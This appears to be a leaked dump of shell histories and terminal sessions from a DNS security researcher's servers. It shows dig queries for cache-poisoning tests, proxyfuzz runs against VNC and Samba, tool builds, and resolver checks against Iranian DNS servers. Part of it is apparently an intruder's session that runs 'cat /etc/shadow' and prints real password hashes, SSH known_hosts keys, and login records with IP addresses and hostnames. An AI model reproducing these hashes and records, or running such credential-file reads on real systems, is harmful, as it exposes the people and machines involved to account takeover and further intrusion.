@127.0.0.1 ns1.toorrr.com dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1337 dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1337 dig @127.0.0.1 foo.www.toorrr.com type1338 dig @127.0.0.1 foo.www.toorrr.com type1339 dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com type1340 dig @127.0.0.1 www.toorrr.com type1340 dig @127.0.0.1 www.toorrr.com type1341 dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 www.toorrr.com any dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com killall named named dig @127.0.0.1 $RANDOM.www.toorrr.com killall named named dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 www.toorrr.com killall named named dig @127.0.0.1 www.toorrr.com dig @127.0.0.1 www.toorrr.com TYPE1337 dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 www.toorrr.com TYPE1337 dig @127.0.0.1 www.toorrr.com ANY dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 foo.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx fg dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com any dig @127.0.0.1 $RANDOM.www.toorrr.com dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx dig @127.0.0.1 $RANDOM.www.toorrr.com mx tcpdump -n port 53 -w log tcpdump -n port 53 -s 2000 -w log tcpdump -vvv -r log tcpdump -vvv -r log | grep -i mx22 dig @127.0.0.1 mx22.toorrr.com +norecurse dig @127.0.0.1 mx22.toorrr.com any +norecurse dig @127.0.0.1 mx22.toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx +norecurse dig @127.0.0.1 toorrr.com mx dig mx16.toorrr.com. dig mx17.toorrr.com any dig mx17.toorrr.com +norecurse dig @127.0.0.1 mx17.toorrr.com +norecurse killall named named screen -D -R screen -D -R ps -axf | grep perl exps -axf ps -axf | grep perl ps axf | grep -i named named screen -D -R dig foo.toorrr.com dig foo.toorrr.com dig foo.toorrr.com dig @127.0.0.1 $RANDOM.foo.toorrr.com dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @deluvian.doxpara.com $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX fg dig ns1.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.foo.toorrr.com dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.foo.toorrr.com MX dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com sleep 10; dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com while [ 1 ] ; do dig @127.0.0.1 $RANDOM.dns-integrity-scan.com; sleep 1; done dig +norecurse @127.0.0.1 www.google.com dig +norecurse @127.0.0.1 www.google.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com mx ~.\ ~. dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com dig @127.0.0.1 $RANDOM.dns-integrity-scan.com screen -D -R ls screen -D -R nc frontend.doxpara.com 500 nc frontend.doxpara.com 500 ls python proxyfuzz.py python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v wget http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py python proxyfuzz.py apt-cache search twisted apt-get install python-twisted python proxyfuzz.py apt-cache search vnc apt-get install xvnc apt-cache search xvnc apt-get install vncserver apt-cache search vnc apt-get install vino apt-get update apt-get install vino vino vino-preferences vino-preferences -h man vino-preferences apt-cache search vnc cd wget http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10_unixsrc.tar.bz2 tar xjvf tightvnc-1.3.10_unixsrc.tar.bz2 cd vnc_unixsrc/ ls make imake qmake apt-get install imake imake ls imake make make vncserver make xvnc make all more Makefile ls rm Makefile imake more README xmkmf make World python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v python proxyfuzz.py -l 5901 -r 127.0.0.1 -p 5902 -w 5 -v tcpdump -n tcpdump -n port 22 tcpdump -n not port 22 tcpdump -n not port 22 and tcp python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 20 -v python proxyfuzz.py python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 20 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 200000 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 5 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25 -v -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25 -c python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 25 -s python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 60 -s python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 600000 -v -s python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 600000 -s python proxyfuzz.py -l 5900 -r 127.0.0.1 -p 5902 -w 70 -v -s apt-get install samba ls cd /etc ls cd samba/ ls vim smb.conf pwd ls ~ ls /home/root mkdir /tmp/stuff touch /tmp/stuff/heh.txt fg /etc/init.d/samba restart cd /tmp cd test ls cd stuff/ ls vim hello.txt man smb.conf ls wget http://zapinspace.com/images/previous_day.gif apt-cache search netatalk apt-cache search afp cd wget http://prdownloads.sourceforge.net/netatalk/netatalk-2.0.3.tar.bz2?download tar xzvf netatalk-2.0.3.tar.bz2 tar xjvf netatalk-2.0.3.tar.bz2 cd netatalk-2.0.3 l ls ./configure apt-cache search bdb apt-get install libdb-dev ./configure make make find . | grep -i cnid_index.c vim ./bin/cnid/cnid_index.c ls cd /etc/init.d/samba stop man smb.conf cd /etc/samba/ ls vim smb.conf vim smb.conf /etc/init.d/samba start cd python proxyfuzz.py python proxyfuzz.py -l 445 -r 127.0.0.1 -p 446 -s -v python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -s -v telnet 127.0.0.1 139 telnet 127.0.0.1 140 python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -s -v python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 20 -s -v python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 40 -s -v python proxyfuzz.py -l 139 -r 127.0.0.1 -p 140 -w 40 -s -v ls cd netatalk-2.0.3 ls make vim cnid_index.c find . | grep -i cnid_index.c vim ./bin/cnid/cnid_index.c make fg make fg make fg make find . | grep -i dbif.c vim ./etc/cnid_dbd/dbif.c make ls cd bin/ ls cd .. ls cd sb ls more README cd doc/Netatalk-Manual.txt cd doc/Netatalk-Manual.txt more doc/Netatalk-Manual.txt make install netatalk-config fg more doc/Netatalk-Manual.txt atalkd -h atalkd - atalkd ? atalkd -? atalkd fg ls cd .. ls screen -D -R dig @217.219.86.36 www.news.com dig @217.219.86.36 www.facebook.com dig @217.219.86.36 www.news.com dig @217.219.86.36 www.fark.com dig @217.219.86.36 www.twitter.com dig @217.219.86.36 www.facebook.com dig @81.12.75.2 www.news.com dig @81.12.75.2 www.facebook.com dig @81.12.75.2 www.bbc.co.uk dig @81.12.75.2 www.myspace.com dig @217.218.120.131 www.news.com dig @81.12.75.2 www.cnn.com dig @81.12.75.2 tehranbureau.com dig @81.12.75.2 twitter.com dig @81.12.75.2 www.twitter.com dig @81.12.75.2 www.friendfeed.com dig @81.12.75.2 www.youtube.com dig @217.219.86.36 www.news.com dig @217.219.86.36 www.twitter.com dig @217.219.86.36 www.friendfeed.com dig @217.219.86.36 www.facebook.com dig @217.219.86.36 www.facebook.com dig @81.12.75.2 www.facebook.com dig @202.227.96.4 www.news.com dig @202.227.96.4 www.news.com dig @80.191.197.2 www.news.com dig @213.217.54.99 www.news.com dig @213.217.54.99 www.twitter.com dig @213.217.54.99 www.facebook.com dig @213.217.54.99 www.facebook.com dig @213.217.54.99 www.facebook.com dig @213.217.54.99 www.facebook.com dig @81.12.75.2 www.facebook.com dig @81.12.75.2 www.facebook.com dig @81.12.75.2 www.facebook.com dig @80.191.175.131 www.facebook.com dig @81.12.75.2 www.cnn.com dig @81.12.75.2 www.facebook.com dig @85.185.143.162 www.news.com dig @80.191.249.6 www.news.com dig @80.191.249.6 www.facebook.com dig @81.12.75.2 www.facebook.com dig @217.219.158.131 www.news.com dig @217.219.158.131 www.facebook.com dig +norecurse @217.219.158.131 www.facebook.com dig +norecurse @217.219.158.131 www.facebook.com dig +norecurse @217.219.158.131 glb01.ash1.tfbnw.net. dig @217.219.158.131 www.facebook.com dig @217.219.158.131 www.facebook.com dig @217.219.158.131 www.youtube.com dig @217.219.158.131 mail.google.com dig @217.219.158.131 www.gmail.com dig @217.219.30.132 www.news.com dig @217.219.30.132 www.facebook.com dig @217.219.30.132 www.twitter.com dig @80.191.117.2 www.twitter.com dig @80.191.117.2 www.cnn.com perl -MCPAN -e shell screen -D -R screen -D -R perl -MCPAN -e shell screen -D -R ls ls *pl apt-get install ircii apt-cache search irc apt-get install irssi irc irssi adduser notroot su notroot apt-get install BitchX apt-cache search bitchx apt-cache search bitch apt-cache search Bitch apt-cache search irc irc irssi root at ovz-test:/root# ls -la /home/notroot/ total 28 drwxr-xr-x 3 notroot notroot 4096 Jun 24 10:26 . drwxr-xr-x 3 root root 4096 Jun 24 10:24 .. -rw------- 1 notroot notroot 36 Jun 24 10:26 .bash_history -rw-r--r-- 1 notroot notroot 220 Jun 24 10:24 .bash_logout -rw-r--r-- 1 notroot notroot 2940 Jun 24 10:24 .bashrc drwx------ 2 notroot notroot 4096 Jun 24 10:26 .irssi -rw-r--r-- 1 notroot notroot 586 Jun 24 10:24 .profile root at ovz-test:/root# cat /home/notroot/.bash_history irsii irssi apt-get install BitchX root at ovz-test:/root# cat /etc/shadow root:JuP94Nj1hM6Lg:14235:0:99999:7::: daemon:*:14131:0:99999:7::: bin:*:14131:0:99999:7::: sys:*:14131:0:99999:7::: sync:*:14131:0:99999:7::: games:*:14131:0:99999:7::: man:*:14131:0:99999:7::: lp:*:14131:0:99999:7::: mail:*:14131:0:99999:7::: news:*:14131:0:99999:7::: uucp:*:14131:0:99999:7::: proxy:*:14131:0:99999:7::: www-data:*:14131:0:99999:7::: backup:*:14131:0:99999:7::: list:*:14131:0:99999:7::: irc:*:14131:0:99999:7::: gnats:*:14131:0:99999:7::: nobody:*:14131:0:99999:7::: libuuid:!:14131:0:99999:7::: dhcp:*:14131:0:99999:7::: syslog:*:14131:0:99999:7::: klog:*:14131:0:99999:7::: sshd:*:14131:0:99999:7::: mysql:!:14132:0:99999:7::: messagebus:*:14347:0:99999:7::: notroot:$1$5NXgAYu1$Q36ieersIyfNKhG3HP4rF0:14419:0:99999:7::: root at ovz-test:/root# ls -la .ssh/ total 12 drwx------ 2 root root 4096 Dec 27 2008 . drwxr-xr-x 12 root root 4096 Jun 24 10:23 .. -rw-r--r-- 1 root root 884 Dec 27 2008 known_hosts root at ovz-test:/root# cat .ssh/known_hosts |1|HENau5Q1+yxFsWNa0yBD2VN54IU=|GNshk4V0xaC8TR8hZZzjeQJPx7o= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAw/uVRWNFRR0fdz1/0TY5zVlLSddEYng8F2YWQL9ytDeLw5heMue 5/ZPY9wjMG8ce8ekTYDEApd0d55CzoAJBl6llc67jGxFpBVHAiM73Wn8xv0wRK21XGGgbOMhY7Awk+3 mDQuMGqlPkX1SnePMqQ59xnjvj+RfNhidQr1xfhIEU0UDuBYSh+Ndzm3w4uNMjXuzfYpUVOBQpyQn1/ 2ptG0mssozSbRKMLYM2wjM+uXfTSifam3zzxfTJa+9nG7i3KpIOaSDLC19mLYD60rOotN3vyzbnAF1w nWUcVeHFmx7gDQuUnNcP2ZZpTtEfhdqw88R0OBO9Sn3KhWxZduqXtw== |1|rTzTH8L7r8bFVz2KWEQuUou/gDM=|3w8k16LRasUGIshZU3MCH59jdNI= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAw/uVRWNFRR0fdz1/0TY5zVlLSddEYng8F2YWQL9ytDeLw5heMue 5/ZPY9wjMG8ce8ekTYDEApd0d55CzoAJBl6llc67jGxFpBVHAiM73Wn8xv0wRK21XGGgbOMhY7Awk+3 mDQuMGqlPkX1SnePMqQ59xnjvj+RfNhidQr1xfhIEU0UDuBYSh+Ndzm3w4uNMjXuzfYpUVOBQpyQn1/ 2ptG0mssozSbRKMLYM2wjM+uXfTSifam3zzxfTJa+9nG7i3KpIOaSDLC19mLYD60rOotN3vyzbnAF1w nWUcVeHFmx7gDQuUnNcP2ZZpTtEfhdqw88R0OBO9Sn3KhWxZduqXtw== root at ovz-test:/root# last wtmp begins Wed Jul 1 06:54:39 2009 root at ovz-test:/root# :/ root at ovz-test:/root# logout Connection to 209.40.204.174 closed. %w 8:45AM up 75 days, 11:54, 1 user, load averages: 0.18, 0.13, 0.09 USER TTY FROM LOGIN@ IDLE WHAT crystal p0 76.14.85.220 6:47AM 1:58 sleep 60 !~~~~~~~~ attacker.doxpara.com ~~~~~~~~! root at attacker.doxpara.com's password: stdin: is not a tty uname -a; id Linux attacker 2.6.18-53.1.13.el5xen #1 SMP Tue Feb 12 14:04:18 EST 2008 i686 GNU/Linux uid=0(root) gid=0(root) groups=0(root) w 15:58:41 up 62 days, 13:05, 0 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT last reboot system boot 2.6.18-53.1.13.e Tue May 19 03:04 - 15:58 (62+12:53) root pts/0 65.88.2.5 Wed Mar 11 19:33 - 21:46 (02:13) root pts/2 c-68-32-169-60.h Fri Mar 6 19:26 - 21:38 (02:11) root pts/1 dhcp64-134-142-7 Fri Mar 6 19:25 - 21:37 (02:11) root pts/0 c-68-49-183-84.h Fri Mar 6 19:03 - 21:16 (02:13) root pts/1 pool-71-163-75-2 Fri Mar 6 00:47 - 19:25 (18:38) root pts/1 dsl092-160-052.w Fri Mar 6 00:28 - 00:47 (00:18) root pts/2 166.197.228.144 Fri Mar 6 00:12 - 02:24 (02:12) root pts/1 c-68-49-183-84.h Thu Mar 5 23:44 - 00:14 (00:29) root pts/0 c-68-49-183-84.h Thu Mar 5 23:09 - 01:25 (02:15) root pts/0 c-68-49-183-84.h Thu Mar 5 22:18 - 23:05 (00:46) root pts/0 75-32-103-7.ligh Thu Feb 19 23:36 - 23:37 (00:00) root pts/0 75-32-103-7.ligh Thu Feb 19 23:34 - 23:34 (00:00) root pts/0 75-32-103-7.ligh Thu Feb 19 23:29 - 23:32 (00:03) reboot system boot 2.6.18-53.1.13.e Wed Feb 18 00:03 - 15:58 (152+15:54) root pts/0 dsl081-172-254.s Mon Feb 16 07:41 - down (1+15:56) reboot system boot 2.6.18-53.1.13.e Mon Feb 16 07:18 - 23:38 (1+16:20) root pts/1 dsl081-172-254.s Sun Feb 15 20:20 - down (10:31) root pts/1 dsl081-172-254.s Sun Feb 15 19:53 - 19:53 (00:00) root pts/1 dsl081-172-254.s Thu Feb 5 08:37 - 19:53 (10+11:16) root pts/5 ip-69-33-128-51. Thu Feb 5 08:34 - down (10+22:17) root pts/5 62-50-219-254.cl Sat Dec 27 19:16 - 08:34 (39+13:17) root pts/1 62-50-219-254.cl Sat Dec 27 18:27 - 19:22 (00:54) root pts/1 62-50-219-254.cl Sat Dec 27 14:55 - 18:27 (03:32) root pts/5 62-50-219-254.cl Sat Dec 27 02:53 - 19:16 (16:23) root pts/1 62-50-219-254.cl Sat Dec 27 01:39 - 02:53 (01:13) root pts/1 75-121-26-93.dyn Thu Dec 25 03:14 - 01:39 (1+22:25) root pts/1 75-121-26-93.dyn Tue Dec 23 02:28 - 03:14 (2+00:45) root pts/0 75-121-26-93.dyn Tue Dec 23 02:07 - 04:08 (02:00) reboot system boot 2.6.18-53.1.13.e Tue Dec 23 00:08 - 06:51 (55+06:43) wtmp begins Tue Dec 23 00:08:27 2008 ls -la total 1328 drwxr-xr-x 8 root root 4096 Mar 6 01:00 . drwxr-xr-x 21 root root 4096 Dec 23 2008 .. -rw-r--r-- 1 root root 7519 Mar 11 21:46 .bash_history -rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc drwxr-xr-x 3 root root 4096 Dec 23 2008 .cpan -rw------- 1 root root 398 Feb 15 20:34 .mysql_history -rw-r--r-- 1 root root 141 Oct 20 2007 .profile -rw------- 1 root root 1024 Dec 23 2008 .rnd drwxr-xr-x 4 maildrop users 4096 Dec 23 2008 MIME-Base64-3.07 -rw-r--r-- 1 root root 15548 Nov 30 2005 MIME-Base64-3.07.tar.gz drwxr-xr-x 7 1001 root 4096 Dec 23 2008 Net-DNS-0.63 -rw-r--r-- 1 root root 149488 Feb 8 2008 Net-DNS-0.63.tar.gz drwxr-xr-x 4 maildrop maildrop 4096 Dec 23 2008 Net-IP-1.25 -rw-r--r-- 1 root root 25749 May 24 2006 Net-IP-1.25.tar.gz drwxr-xr-x 6 maildrop maildrop 4096 Dec 23 2008 Net-Server-Mail-0.17 -rw-r--r-- 1 root root 16017 Mar 17 2008 Net-Server-Mail-0.17.tar.gz -rw-r--r-- 1 root root 0 Feb 15 20:28 config.h -rw-r--r-- 1 root root 1620 Feb 16 08:09 dns.pl -rw-r--r-- 1 root root 228850 Dec 23 2008 dnsrake.zip -rwxr-xr-x 1 root root 12335 Mar 6 01:00 dnsrake_hacdc -rw-r--r-- 1 root root 8741 Mar 6 00:59 dnsrake_hacdc.c -rw-r--r-- 1 root root 1762 Mar 6 00:57 hacdcdemo.pl drwxr-xr-x 11 maildrop maildrop 4096 Feb 15 20:28 ldns-1.5.1 -rw-r--r-- 1 root root 781562 Feb 10 17:35 ldns-1.5.1.tar.gz -rw-r--r-- 1 root root 768 Dec 23 2008 mail.pl -rwxr-xr-x 1 root root 13883 Feb 15 20:35 phonym -rw-r--r-- 1 root root 7738 Feb 15 20:45 phonym.c cat .bash_history apt-get clean logout exit apt-cache search ldns gcc apt-get install gcc make binutils apt-get install gcc make binutils libc6-dev hostname hostname ls apt-get install postfix apt-get install dovecot apt-get install dovecot-common useradd maildrop passwd maildrop cd/etc cd /etc cd postfix/ ls vim /etc/postfix/virtusertable hostname hostname attacker vim /etc/hostname perl -MCPAN -e shell ls bg top fg kill %1 cd wget http://search.cpan.org/CPAN/authors/id/G/GU/GUIMARD/Net-Server-Mail-0.17.tar.gz /etc/init.d/postfix stop tar xzvf Net-Server-Mail-0.17.tar.gz cd Net-Server-Mail-0.17 perl Makefile.PL make install cd cat > mail.pl vim mail.pl perl mail.pl vim mail.pl perl mail.pl fg kill %1 fg kill -9 %1 fg %2 vim mail.pl perl mail.pl perl mail.pl fg perl mail.pl fg perl mail.pl perl mail.pl perl mail.pl perl mail.pl fg %2 fg perl mail.pl fg perl mail.pl vim mail.pl perl mail.pl fg vim mail.pl hostname perl mail.pl screen -D -R apt-get install screen screen -D -R wget http://search.cpan.org/CPAN/authors/id/O/OL/OLAF/Net-DNS-0.63.tar.gz perl -MCPAN -e shell screen -D -R screen -D R screen -D -R screen -D -R fg screen -D -R screen -D -R mysql cd /etc cd mysql/ ls vim my.cnf ifconfig fg /etc/init.d/mysql stop /etc/init.d/mysql start mysql mysql backend screen -D -R apt-get install postfix dig $RANDOM.doxdns1.com perl mail.pl perl mail.pl wget http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/MIME-Base64-3.07.tar.gz tar xzvf MIME-Base64-3.07.tar.gz cd MIME-Base64-3.07 perl Makefile.PL make make install cd .. vim mail.pl perl mail.pl perl mail.pl perl mail.pl dig +trace ns89.worldnic.com dig +trace www.doxpara.com dig txt123.doxdns1.com dig txt123.doxdns1.com txt dig txt123.doxdns1.com txt dig @backend.doxpara.com txt123.doxdns1.com txt cd wget http://perl.secsup.org/authors/id/O/OL/OLAF/Net-DNS-0.63.tar.gz killall -9 perl wget http://www.sfr-fresh.com/unix/privat/Net-DNS-0.63.tar.gz tar xzvf Net-DNS-0.63.tar.gz cd Net-DNS-0.63 perl Makefile.PL cd wget http://search.cpan.org/CPAN/authors/id/M/MA/MANU/Net-IP-1.25.tar.gz tar xzvf Net-IP-1.25.tar.gz cd Net-IP-1.25 perl Makefile.PL make make install cd .. cd Net::DNS cd *DNS* ls perl Makefile perl Makefile.PL make install cd vim dns.pl perl dns.pl fg vim dns.pl perl dns.pl fg vim dns.pl perl dns.pl ifconfig perl dns.pl fg vim dns.pl perl dns.pl fg perl dns.pl fg ifconfig fg perl dns.pl fg vim dns.pl perl dns.pl vim dns.pl perl dns.pl fg perl dns.pl fg vim dns.pl perl dns.pl fg perl dns.pl fg fg perl dns.pl ping attacker.doxpara.com tcpdump -n port 53 apt-get install tcpdump tcpdump -n port 53 ls mysql screen -D -R passwd root screen -X screen -x screen -D -R -x screen -X screen -h screen -D -R screen -x ls cd /var/www ls ls -l ps axf | grep -i apache ps axf | grep -i mysql cd /var/www/ l ls ps axf | grep -i apache cd /usr ls cd /var ls cd ls cd / ls find . | html find . | grep html find . | grep apache2 cd /var/www ls more index.html wget wget http://ftp.drupal.org/files/projects/drupal-5.15.tar.gz tar xzvf drupal-5.15.tar.gz cd drupal-5.15 ls mv * .. cd .. ls chmod -R 0777 sites/default/settings.php mysql chmod 0700 sites/default/settings.php ls rm index.html vi settings.php vi sites/default/settings.php mysql toorcamp ls mv drupal-5.15.tar.gz .. rm -rf * tar xzvf ../drupal-5.15.tar.gz cd drupal-5.15/ ls mv * .. cd . . ls ls cd .. ls mysql chmod 0777 sites/default/settings.php chmod 0700 sites/default/settings.php chmod -R 0777 . ls ls ls ls ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql ls -l toorcamp.sql sync sync ls - l ls -l mysqldump toorcamp | less mysqldump toorcamp | less mysqldump toorcamp > toorcamp.sql ls -l toorcamp.sql mysql toorcamp cd perl dns.pl fg vim dns.pl perl dns.pl perl dns.pl fg perl dns.pl fg vim dns.pl perl dns.pl vim phonym.c ls perl dns.pl cd vim phonym.c gcc -o phonym phonym.c -ldns gcc -o phonym phonym.c -lldns ./phonym com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com while [ 1 ] ; do ./phonym doxpara.com; done while [ 1 ] ; do ./phonym doxpara.com; done ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com ./phonym doxpara.com gf fg vim phonym.c ls apt-cache search ldns wget http://www.nlnetlabs.nl/downloads/ldns/ldns-1.5.1.tar.gz tar xzvf ldns-1.5.1.tar.gz cd ldns-1.5.1 ls ./configure apt-get install openssl-dev apt-cache search ssl apt-get install libssl-dev apt-get update apt-get install libssl-dev ./configure make -j2 make install cd gcc -o phonym phonym.c touch config.h gcc -o phonym phonym.c gcc -o phonym phonym.c -ldns gcc -o phonym phonym.c -lldns ./phonym doxpara.com ln -s 